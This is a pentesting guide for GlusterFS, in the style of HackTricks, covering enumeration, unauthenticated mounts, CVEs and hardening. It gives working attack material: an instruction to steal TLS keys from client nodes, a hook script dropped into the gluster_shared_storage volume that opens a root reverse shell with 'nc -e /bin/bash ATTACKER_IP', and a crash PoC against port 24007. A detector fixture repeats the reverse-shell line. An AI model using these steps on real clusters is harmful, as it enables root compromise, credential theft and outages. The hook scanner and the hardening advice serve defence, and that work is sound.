24007-24008-24009-49152 - Pentesting GlusterFS
{{#include ../banners/hacktricks-training.md}}
## Basic Information

GlusterFS is a distributed file system that aggregates storage from many servers into a single namespace. The management daemon (glusterd) listens by default on 24007/TCP and spawns the data-plane bricks, which start at 49152/TCP (one port per brick, incrementing). Older releases used 24008-24009/TCP for the brick transport, so you will still see those ports in legacy clusters.

```
PORT      STATE SERVICE       VERSION
24007/tcp open  glusterd      GlusterFS (RPC)
49152/tcp open  gluster-brick SSL (TLS optional)
```

Tip: 24007 answers RPC calls even on storage-only nodes that export no volumes, so this service is a reliable target inside large infrastructures.
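To show what "answers RPC calls" means on the wire, here is an added example (not HackTricks code and not part of the GlusterFS project): a minimal ONC RPC (RFC 5531) client that frames a NULL-procedure CALL with TCP record marking, the wire format glusterd speaks on 24007, and classifies the REPLY. Any well-formed RPC reply, even PROG_UNAVAIL, proves a live RPC listener without needing the gluster CLI. The program number and version are caller-supplied assumptions, not values taken from this page.

```python
#!/usr/bin/env python3
"""Added example: ONC RPC NULL-call probe (RFC 5531 framing, AUTH_NULL).
prog/vers are assumptions supplied by the caller."""
import socket
import struct

CALL, REPLY = 0, 1
MSG_ACCEPTED, MSG_DENIED = 0, 1
AUTH_NULL = 0
ACCEPT_STAT = {0: "SUCCESS", 1: "PROG_UNAVAIL", 2: "PROG_MISMATCH",
               3: "PROC_UNAVAIL", 4: "GARBAGE_ARGS", 5: "SYSTEM_ERR"}


def build_null_call(xid: int, prog: int, vers: int) -> bytes:
    """CALL body: xid, msg_type, rpcvers=2, prog, vers, proc=0, then empty AUTH_NULL cred+verf."""
    hdr = struct.pack("!IIIIII", xid, CALL, 2, prog, vers, 0)
    auth = struct.pack("!IIII", AUTH_NULL, 0, AUTH_NULL, 0)
    return hdr + auth


def frame(record: bytes) -> bytes:
    """Record marking: 31-bit fragment length with the last-fragment bit (MSB) set."""
    return struct.pack("!I", len(record) | 0x80000000) + record


def unframe(data: bytes) -> bytes:
    """Strip one single-fragment record; reject anything inconsistent."""
    if len(data) < 4:
        raise ValueError("short record header")
    hdr, = struct.unpack("!I", data[:4])
    if not hdr & 0x80000000:
        raise ValueError("multi-fragment record not supported")
    length = hdr & 0x7FFFFFFF
    if len(data) < 4 + length:
        raise ValueError("truncated record")
    return data[4:4 + length]


def parse_reply(record: bytes, expect_xid: int) -> str:
    """Decode a REPLY body into a verdict string."""
    xid, mtype, reply_stat = struct.unpack("!III", record[:12])
    if xid != expect_xid or mtype != REPLY:
        raise ValueError("not a reply to our xid")
    if reply_stat == MSG_DENIED:
        return "MSG_DENIED"
    # accepted reply: verifier (flavor, opaque length, body padded to 4) then accept_stat
    _flavor, vlen = struct.unpack("!II", record[12:20])
    off = 20 + vlen + (-vlen % 4)
    accept_stat, = struct.unpack("!I", record[off:off + 4])
    return ACCEPT_STAT.get(accept_stat, f"UNKNOWN({accept_stat})")


def build_reply(xid: int, accept_stat: int) -> bytes:
    """Accepted REPLY with an empty AUTH_NULL verifier (lets parse_reply be exercised offline)."""
    return struct.pack("!IIIIII", xid, REPLY, MSG_ACCEPTED, AUTH_NULL, 0, accept_stat)


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-record")
        buf += chunk
    return buf


def probe(host: str, prog: int, vers: int, port: int = 24007, timeout: float = 5.0) -> str:
    """Send one NULL call and return the verdict ('SUCCESS', 'PROG_UNAVAIL', ...)."""
    xid = 0x474C5553  # arbitrary transaction id
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(frame(build_null_call(xid, prog, vers)))
        hdr = _recv_exact(s, 4)
        body = _recv_exact(s, struct.unpack("!I", hdr)[0] & 0x7FFFFFFF)
    return parse_reply(unframe(hdr + body), xid)


if __name__ == "__main__":
    import sys
    # usage: rpc_probe.py <host> <prog> <vers>   (prog/vers are assumptions you supply)
    print(probe(sys.argv[1], int(sys.argv[2]), int(sys.argv[3])))
```

A PROG_UNAVAIL or PROG_MISMATCH verdict is still a positive identification of an RPC endpoint; only a timeout, a reset, or garbage that fails `unframe`/`parse_reply` means the port is not speaking RPC.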
## Enumeration

Install the client tools on your attack box:

```bash
sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu
```

- Peer discovery & health

```bash
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```

- Volume reconnaissance

```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```

- Unauthenticated mount

```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```

If the mount fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side. The usual causes are:

- TLS enforcement (`option transport.socket.ssl on`)
- Address-based access control (`option auth.allow <cidr>`)
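Rather than mounting every volume to find out which ones reject you, the `volume info all` output already tells you which volumes enforce TLS or an `auth.allow` list. The following is an added example (not HackTricks code and not a GlusterFS project tool) that parses that output and flags volumes an anonymous client should be able to mount. It assumes the CLI's `Key: value` layout with `Bricks:` and `Options Reconfigured:` sections, as `gluster volume info` prints it; the sample output embedded below is constructed, not captured from a real cluster, and the audit rules (no `transport.socket.ssl: on`, `auth.allow` absent or `*`) are this example's own.

```python
#!/usr/bin/env python3
"""Added example: parse `gluster volume info all` text and flag anonymously mountable volumes."""
from typing import Dict, List

# Constructed sample, not real cluster output.
SAMPLE_VOLUME_INFO = """\
Volume Name: gv0
Type: Replicate
Volume ID: 5a0c4f1e-0f0c-4c1e-9f5a-2b4c6d8e0f12
Status: Started
Number of Bricks: 1 x 2 = 2
Transport-type: tcp
Bricks:
Brick1: 10.10.11.131:/data/brick1/gv0
Brick2: 10.10.11.132:/data/brick1/gv0
Options Reconfigured:
transport.address-family: inet
nfs.disable: on

Volume Name: gluster_shared_storage
Type: Replicate
Volume ID: 7d3e9a2b-1c4f-4e8a-b6d0-9f1e2c3a4b5d
Status: Started
Number of Bricks: 1 x 2 = 2
Transport-type: tcp
Bricks:
Brick1: 10.10.11.131:/var/lib/glusterd/ss_brick
Brick2: 10.10.11.132:/var/lib/glusterd/ss_brick
Options Reconfigured:
cluster.enable-shared-storage: enable

Volume Name: secure
Type: Distribute
Volume ID: 0b1c2d3e-4f5a-4b6c-8d7e-9f0a1b2c3d4e
Status: Started
Number of Bricks: 1
Transport-type: tcp
Bricks:
Brick1: 10.10.11.131:/data/brick1/secure
Options Reconfigured:
transport.socket.ssl: on
auth.allow: 10.0.0.0/24
"""


def parse_volume_info(text: str) -> Dict[str, dict]:
    """Return {volume_name: {"bricks": [...], "options": {...}, <other fields>}}."""
    vols: Dict[str, dict] = {}
    cur = None
    in_opts = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Volume Name:"):
            cur = {"bricks": [], "options": {}}
            vols[line.split(":", 1)[1].strip()] = cur
            in_opts = False
            continue
        if cur is None:
            continue  # junk before the first volume
        if line == "Options Reconfigured:":
            in_opts = True
            continue
        if line == "Bricks:":
            in_opts = False
            continue
        key, _, val = line.partition(":")   # split on the FIRST colon only (brick paths contain ':')
        key, val = key.strip(), val.strip()
        if in_opts:
            cur["options"][key] = val
        elif key.startswith("Brick"):
            cur["bricks"].append(val)
        else:
            cur[key] = val
    return vols


def audit(vols: Dict[str, dict]) -> Dict[str, List[str]]:
    """Flag volumes with no TLS and no client restriction; call out the admin volume."""
    findings: Dict[str, List[str]] = {}
    for name, v in vols.items():
        opts = v["options"]
        issues = []
        if opts.get("transport.socket.ssl", "off").lower() != "on":
            issues.append("no TLS on brick transport")
        if opts.get("auth.allow", "*") in ("", "*"):   # gluster's default is '*'
            issues.append("auth.allow unrestricted")
        if issues and name == "gluster_shared_storage":
            issues.insert(0, "admin volume mountable: hooks run as root cluster-wide")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for vol, issues in audit(parse_volume_info(SAMPLE_VOLUME_INFO)).items():
        print(vol, "->", "; ".join(issues))
```

Feed it real output with `gluster --remote-host <ip> volume info all | python3 audit.py` after swapping `SAMPLE_VOLUME_INFO` for `sys.stdin.read()`; the volumes it lists are the ones to try with the mount command above, and `gluster_shared_storage` is the one to look at first.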
## Certificate recovery

Steal the following files from any authorised client node and drop them into /etc/ssl/ (or the directory named in the error log):

```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```
## Known vulnerabilities (2022-2025)

| CVE | Affected versions | Impact | Notes |
|---|---|---|---|
| CVE-2022-48340 | 10.0–10.4, 11.0 | Use-after-free in dht_setxattr_mds_cbk reachable over the network | Remote DoS and possible RCE. Fixed in 10.4.1 / 11.1. |
| CVE-2023-26253 | < 11.0 | Out-of-bounds read in the FUSE notify handler | Remote crash via crafted FS operations; public PoC available. |
| CVE-2023-3775 | < 10.5 / 11.1 | Improper permission check when mounting gluster_shared_storage | Lets any unauthenticated client mount the admin volume, which leads to the priv-esc described below. |

Always check `gluster --version` on every node; mixed-version clusters are common after partial upgrades.
## Abusing gluster_shared_storage (Privilege Escalation)

Even on recent versions, many administrators leave the special gluster_shared_storage volume accessible to everyone because it simplifies geo-replication. This volume holds cronjob templates that run as root on every node.

```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root
```

If hooks/1/ does not exist, look under /ss_bricks/; the actual path can differ between major versions.
## Denial-of-Service PoC (CVE-2023-26253)

```python
#!/usr/bin/env python3
# Minimal reproducer: sends a malformed NOTIFY_REPLY XDR frame to 24007.
# xdrlib was removed in Python 3.13; struct.pack("!I") yields the same
# 4-byte big-endian XDR unsigned int that xdrlib.Packer.pack_uint produced.
import socket
import struct

payload = struct.pack("!I", 0xDEADBEEF)
with socket.create_connection(("10.10.11.131", 24007)) as s:
    # RPC record marking: fragment length with the last-fragment bit set, then the body
    s.sendall(struct.pack("!L", len(payload) | 0x80000000))
    s.sendall(payload)
```

Running the script crashes glusterfsd < 11.0.
## Hardening & Detection

- Upgrade: the current LTS is 11.1 (July 2025). All CVEs above are patched there.
- Enable TLS on every brick:

```bash
gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
```

- Restrict clients with CIDR lists:

```bash
gluster volume set <vol> auth.allow 10.0.0.0/24
```

- Expose the management port 24007 only on a private VLAN or through SSH tunnels.
- Watch the logs: `tail -f /var/log/glusterfs/glusterd.log`, and enable the audit-log feature (`gluster volume set <vol> features.audit-log on`).
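Log watching will not show a hook script that was planted through the shared-storage volume, so a defender also wants to diff the hook directories themselves. The following is an added example (not HackTricks code and not part of GlusterFS): it walks a gluster_shared_storage mount (or a node's own glusterd hooks tree), lists every executable under `hooks/<version>/<event>/{pre,post}` and reports anything not on an allow-list or writable by group/other, which is exactly what the `test.sh` drop above leaves behind. The `BASELINE` set and the directory tree it scans are constructed for the demo (the tree is built in a temp dir); it does not model glusterd's own ordering rules for hook names.

```python
#!/usr/bin/env python3
"""Added example: detect planted or tampered glusterd hook scripts."""
import os
import stat
import tempfile
from typing import List, Tuple

# Hooks you deployed on purpose (assumed allow-list; adjust to your cluster).
BASELINE = {"S30samba-start.sh"}


def scan_hooks(root: str) -> List[Tuple[str, str]]:
    """Return (relative_path, reason) for every suspicious file under hooks/*/*/{pre,post}."""
    findings: List[Tuple[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        parts = rel_dir.split(os.sep)
        # only hooks/<version>/<event>/<pre|post> directories are executed by glusterd
        if len(parts) != 4 or parts[0] != "hooks" or parts[3] not in ("pre", "post"):
            continue
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            rel = os.path.join(rel_dir, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                findings.append((rel, "symlink in hook dir"))   # may point outside the volume
                continue
            if not st.st_mode & 0o111:
                continue   # non-executable files are never run
            if name not in BASELINE:
                findings.append((rel, "executable not in baseline"))
            if st.st_mode & 0o022:
                findings.append((rel, "group/other writable"))
    return findings


def build_demo_tree() -> str:
    """Constructed fixture: a legitimate hook, a planted reverse-shell hook, and a README."""
    root = tempfile.mkdtemp(prefix="gss-demo-")
    post = os.path.join(root, "hooks", "1", "start", "post")
    os.makedirs(post)

    def write(name: str, mode: int, body: str = "#!/bin/bash\nexit 0\n") -> None:
        p = os.path.join(post, name)
        with open(p, "w") as fh:
            fh.write(body)
        os.chmod(p, mode)

    write("S30samba-start.sh", 0o755)
    write("test.sh", 0o777, "#!/bin/bash\nnc -e /bin/bash 10.0.0.1 4444 &\n")  # planted, world-writable
    write("README", 0o644, "docs only\n")                                        # not executable
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    for rel, reason in scan_hooks(target):
        print(f"[!] {rel}: {reason}")
```

Run it against a real mount with `python3 scan_hooks.py /tmp/gss` or, on a node, against the glusterd state directory that contains `hooks/`; pair it with a cron or systemd timer so a new hook that appears between runs gets noticed before the next volume start event fires it as root.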
## References

- GlusterFS security advisories
- CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash

{{#include ../banners/hacktricks-training.md}}